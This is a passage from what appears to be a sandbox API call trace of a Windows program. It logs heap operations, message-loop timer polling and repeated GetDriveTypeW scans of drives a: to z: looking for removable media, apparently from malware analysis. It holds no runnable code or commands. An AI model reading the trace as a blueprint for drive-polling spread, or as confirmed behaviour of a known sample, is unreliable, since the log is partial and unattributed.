Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.771] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.771] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.772] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.772] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.772] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.772] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.772] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.772] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.773] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.774] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.774] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.774] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.774] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.775] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.776] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.776] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.776] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0219.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0219.777] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.778] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.778] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.778] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0219.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.778] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.779] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.779] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.779] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.779] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.779] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.779] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.780] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.780] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.780] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.781] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.781] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.781] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.781] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.782] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.782] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.782] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.782] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.783] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.783] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.783] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.783] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.783] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.784] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.784] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.784] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.784] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.785] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.785] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.785] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.785] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0219.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0219.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.787] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.787] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.787] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.788] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0219.788] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.788] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.788] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.788] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.788] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.789] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.789] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.789] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.789] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.789] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.792] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.792] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.792] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.792] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.793] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.794] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.794] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.794] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.794] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.794] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.795] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.795] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.875] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.875] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.875] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.875] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.875] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.875] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0219.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0219.876] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0219.876] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.877] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.877] PeekMessageW (in: 